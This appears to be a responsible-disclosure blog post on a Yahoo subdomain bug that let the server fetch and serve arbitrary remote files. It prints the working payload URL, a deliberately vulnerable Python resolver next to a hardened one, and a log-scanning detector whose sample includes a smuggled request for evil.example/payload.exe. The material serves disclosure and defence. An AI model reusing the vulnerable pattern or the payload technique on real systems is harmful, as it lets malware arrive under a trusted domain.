Hello, Namaste, Salam, Olá, Здравствуйте, Hola, Bonjour.
Introduction:-
Today I will share a strange vulnerability which caught my attention, and I'm about to bring it to yours. No one gave it a fancy name, and there were no press releases. It's a simple bug, though.
The purpose of this blog post is to show that some bugs can be discovered very easily with a little thinking :)
POC:-
At the outset, I was attempting to find an RFD (Reflected File Download) bug. I didn't find one, though I landed somewhere else in heaven.
I was testing one of the Yahoo sub-domains, racing.fantasysports.yahoo.com. It has a 'Schedule & Previews' section to preview each race. While checking this Preview function, I noticed that a .pdf file is served to the end user when previewing a race. This file caught my attention.
I started fiddling with it. Then a mischievous thought occurred to me: what if I could download or call a remote file from inside the Yahoo domain?
The next question is:-
The answer is simple.
The URL of the Preview_1.pdf file was
http://racing.fantasysports.yahoo.com/auto/fanballguidepdf/Preview_1.pdf?file=preview&race=1
Now I had to make the Yahoo domain call or download a remote file, so I simply replaced Preview_1.pdf with a full URL on another domain, pointing at the file I wanted served.
i.e. replacing Preview_1.pdf with http://www.7-zip.org/a/7z1506.exe [standing in for a malicious file]
(As per Yahoo's policy you should minimize the mayhem.) Hence I selected a harmless .exe, the 7-Zip installer from the 7-zip.org domain, for my POC.
So my final payload was:-
http://racing.fantasysports.yahoo.com/auto/fanballguidepdf/http://www.7-zip.org/a/7z1506.exe?file=preview&race=5
I hit enter and BOOM.
So I was able to download or call files from another domain through the Yahoo domain: the request went to a yahoo.com host, and the response was the 7-Zip executable.
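Yahoo's server-side code is not shown in this post, so the following is an added example, not Yahoo's code, of how a path-based file handler ends up fetching a third-party URL and how to close the hole. The upstream origin pdf-origin.example.internal, the function names and the Preview_N.pdf filename pattern are assumptions for illustration; only the public Yahoo URL and the 7-Zip URL come from the post.

```python
import re
from typing import Optional
from urllib.parse import urljoin, urlsplit

# Public path seen in the post (fact) and a hypothetical internal origin the
# handler fetches PDFs from (assumption, constructed for this example).
GUIDE_BASE = "http://racing.fantasysports.yahoo.com/auto/fanballguidepdf/"
UPSTREAM_BASE = "http://pdf-origin.example.internal/fanballguide/"

# Assumed allow-list: the only files this feature should ever serve.
PREVIEW_NAME = re.compile(r"^Preview_(\d{1,3})\.pdf$")


def vulnerable_resolve(path_segment: str) -> str:
    """Vulnerable pattern: glue the user-controlled trailing path segment onto
    the upstream base and fetch whatever results.  urljoin() follows RFC 3986,
    so an absolute URL ("http://...") or a network-path reference ("//host/...")
    in the segment REPLACES the base instead of being appended to it, and the
    server fetches an attacker-chosen host and relays the bytes as its own."""
    return urljoin(UPSTREAM_BASE, path_segment)


def hardened_resolve(path_segment: str) -> Optional[str]:
    """Hardened pattern: accept only names from a strict allow-list, then, as
    defence in depth, confirm the final URL still lives on the expected origin
    and under the expected directory.  Returns None when the request must be
    refused (the caller should answer 400/404, not proxy anything)."""
    if not PREVIEW_NAME.fullmatch(path_segment):
        return None
    target = urljoin(UPSTREAM_BASE, path_segment)
    base, tgt = urlsplit(UPSTREAM_BASE), urlsplit(target)
    if (tgt.scheme, tgt.netloc) != (base.scheme, base.netloc):
        return None  # resolved to a different host or scheme
    if not tgt.path.startswith(base.path):
        return None  # escaped the PDF directory (e.g. via "..")
    return target


if __name__ == "__main__":
    for segment in ("Preview_1.pdf",
                    "http://www.7-zip.org/a/7z1506.exe",
                    "//www.7-zip.org/a/7z1506.exe",
                    "../../etc/passwd"):
        print(f"{segment!r}")
        print(f"  vulnerable -> {vulnerable_resolve(segment)}")
        print(f"  hardened   -> {hardened_resolve(segment)}")
```

The allow-list alone is enough to stop the bug; the origin and directory checks are there so that a later relaxation of the pattern (say, allowing subdirectories) cannot quietly reintroduce it.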
What is the problem ?
Yahoo fetches an arbitrary remote URL, and therefore ANY file, from inside its own domain, which makes this attack considerably worse: the download carries a trusted yahoo.com address, so the usual warning sign of a strange host is gone. An attacker can send such a URL to a victim; once the victim clicks it and runs the file they receive, their machine can be compromised.
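As an added example (not part of the original post), here is the kind of check a defender could run over web server access logs to spot requests that smuggle a URL into the guide path. The log lines are constructed for this example and are not real Yahoo logs; the /auto/fanballguidepdf/ prefix is taken from the URLs above, and the Preview_N.pdf allow-list is an assumption about what the feature should legitimately serve.

```python
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

GUIDE_PREFIX = "/auto/fanballguidepdf/"          # from the post
ALLOWED_NAME = re.compile(r"^Preview_\d{1,3}\.pdf$")  # assumed allow-list

# Constructed sample in combined log format: one legitimate preview, the
# 7-Zip request from the post, a percent-encoded scheme-relative variant, and
# another legitimate preview.  Hosts/IPs are documentation values.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Aug/2015:10:01:02 +0000] "GET /auto/fanballguidepdf/Preview_1.pdf?file=preview&race=1 HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Aug/2015:10:02:15 +0000] "GET /auto/fanballguidepdf/http://www.7-zip.org/a/7z1506.exe?file=preview&race=5 HTTP/1.1" 200 1201736 "-" "Mozilla/5.0"
198.51.100.9 - - [31/Aug/2015:10:03:44 +0000] "GET /auto/fanballguidepdf/%2F%2Fevil.example/payload.exe?file=preview HTTP/1.1" 200 9000 "-" "curl/7.43"
198.51.100.9 - - [31/Aug/2015:10:04:00 +0000] "GET /auto/fanballguidepdf/Preview_2.pdf?file=preview&race=2 HTTP/1.1" 200 50123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_target(target: str) -> str:
    """Return '' for a legitimate preview request (or a path outside the
    feature), otherwise a short reason describing why it looks like abuse."""
    # Decode first: %3A%2F%2F is how an attacker hides "://" from naive greps.
    path = unquote(urlsplit(target).path)
    if not path.startswith(GUIDE_PREFIX):
        return ""
    rest = path[len(GUIDE_PREFIX):]
    if "://" in rest:
        return "absolute URL in path"
    if rest.startswith("//"):
        return "scheme-relative URL in path"
    if not ALLOWED_NAME.fullmatch(rest):
        return "filename outside allow-list"
    return ""


def find_remote_fetches(log_text: str) -> List[Dict[str, str]]:
    """Parse each access-log line and collect the suspicious guide requests."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_target(m["target"])
        if reason:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                         "status": m["status"], "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in find_remote_fetches(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['reason']}: {hit['target']}")
```

A 200 status on such a request (rather than a 3xx) is the tell that distinguishes this from a plain open redirect: the server itself answered with the foreign content.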
How they fixed it:-
1] Preview feature disabled.
2] The vulnerable URL now shows the error below.
Video POC:-
After I reported this bug to the Yahoo Security Team, they rewarded me with swag, stating that it was an RFD bug. I dropped them a mail describing the difference between RFD and my bug (in RFD the downloaded content is the attacker's own input reflected in the response; here the server was serving a file fetched from a third-party host).
Thanks to @dsopas he knows what I mean ;)
They replied as below:-
To which they said it was an open redirect bug. Again, I described the difference between open redirect and the reported bug (an open redirect sends the browser off to the other domain; here the file arrived from the Yahoo domain itself).
In the end, they agreed to my claim that it was neither an RFD nor an open redirect attack but a new attack vector submitted by me. The cold war ended, though they retained their decision on "SWAG".
The Yahoo Security Team included me in their Hall of Fame list and rewarded me with SWAG.
Time-Line:
Aug 31, 2015 : Reported to Yahoo Security Team
Sep 01, 2015 : Received initial reply from Yahoo Security Team. Report triaged.
Feb 02, 2016 : Yahoo Security Team resolved the bug and told me to wait for the bounty decision.
Feb 22, 2016 : Swag rewarded, stating that it's RFD.
Feb 22, 2016 : Explained to them the difference between RFD and my reported bug.
Mar 08, 2016 : They confirmed it's not RFD, and replied stating that it's an open redirect bug.
Mar 08, 2016 : Explained the difference between my reported bug and an open redirect bug.
Mar 11, 2016 : They retained their decision on "SWAG".
Mar 27, 2016 : Public responsible disclosure